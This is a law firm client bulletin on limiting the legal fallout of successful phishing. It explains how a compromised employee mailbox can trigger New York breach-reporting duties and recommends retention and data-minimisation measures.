This week’s theme in the Cybersecurity and Infrastructure Security Agency’s (“CISA”) Cybersecurity Awareness Week is Phight the Phish, a fundamental goal of any organization’s cybersecurity program. Why so fundamental? Phishing, or any kind of user-directed fraud, focuses in the first instance on the human: on human strengths or weaknesses (depending on one’s perspective), like trust and willingness to help. And computer-enabled fraud will never go away, at least as long as humans are using computers. Hence, an organization that does not take user fallibility into account is ignoring one of the biggest, and most addressable, weaknesses pre-installed in its network.
CISA offers a number of resources and services to help organizations Phight the Phish, including free phishing campaigns. If there’s one thing an organization can do to better its posture against phishing, it is to raise awareness and empower users via a well-structured phishing campaign. This discussion, however, focuses not on preventing a successful phishing attack, but rather limiting the damage a phishing attack can do when it is successful, because phishing attacks will always find success in some measure.
To better understand the damage a phishing attack can do, it’s imperative to know the pond you—and your attacker—are swimming in. The exponential explosion of data creation and the resulting drop in data storage costs have made that pond murky, with few organizations understanding with any clarity what data they process, where it is stored, and its purpose. Sensitive corporate or personal data is always in places it shouldn’t be, always protected less than it should be, and always subject to a potential phishing attack.
For example, the average employee’s e-mail account. Even a mundane and otherwise inconsequential phishing attack, caught within minutes by the duped user and duly reported to the information security team, can lead to reporting obligations and potential liability, if an organization does not fully, or even materially, understand its data processing practices. This is because, inevitably an employee’s e-mail will contain reportable personal information. Whether it is a spreadsheet containing employee data, a scan of a customer’s driver’s license, a photo of the user’s own credit card or passport, or even of the user’s COVID-19 vaccination card, e-mail is a sponge for sensitive personal data, and one that never seems wrung dry.
Add to this the fact that many phishing attacks can involve software that automatically “syncs” or copies part or all of the compromised mailbox to the attacker’s system, and you have a perfect recipe for breach reportability. Case in point, the New York data breach reporting statute, N.Y. Gen. Bus. Law § 899-aa, which makes reportable nearly any instance of unauthorized access to or acquisition of what the statute defines as “private information,” i.e., name or other identifier plus something more sensitive, like social security number or driver’s license number. When an attacker syncs a compromised mailbox, the attacker most certainly accesses or acquires it as defined in § 899-aa. And most e-mail logging is insufficient to prove one way or the other whether a specific e-mail containing private information was synced or not. Beyond that, when attackers compromise a mailbox, they often manually go through the mailbox, creating mailbox rules or otherwise looking for information that can aid the attack. This too can ring the reportability bell under the access or acquisition standard.
Why should an organization care if the compromise of a single e-mail account becomes reportable? First, it is every organization’s legal duty—at least in relation to the private information of a New Yorker under the N.Y. SHIELD Act, N.Y. Gen. Bus. Law § 899-bb—to adequately and reasonably protect private information. Second, the costs and disruption arising from a reportable phishing attack can vastly outstrip the cost of the attack itself, which can often be negligible, if caught in time. Third, more and more reported breaches are becoming public record, with several state attorneys’ general publishing reporting letters online. Fourth, for those organizations looking to purchase or renew cyber liability insurance, a reportable breach can lead to increased premiums and decreased coverage.
To address these risks, a little bit of filtration can go a long way. User education is the best initial filter to apply, helping remove some of the reportable information from your e-mail environment. Mailbox size restrictions, automatic archiving, and data retention and destruction policies are low-tech tools that can immediately reduce risk in relation to a future phishing attack. It is true that the majority of phishing attacks are not interested in the personal data contained within corporate e-mail accounts, with syncing happening automatically because of the software used by the attacker. That itself does not reduce the risk of potential reportability or reduce the necessity of a little preventive maintenance to your e-mail pond.
So, as we all continue to #PhightThePhish, remember that some of your users will invariably take the phishing bait. No anti-phishing program, however well-intentioned, will truly be comprehensive, if you merely tread water and underestimate the attacker’s potential for success.
If you have any questions regarding this LEGALcurrents, please contact any member of the Privacy and Data Security group at 585.232.6500 or 716.853.1616.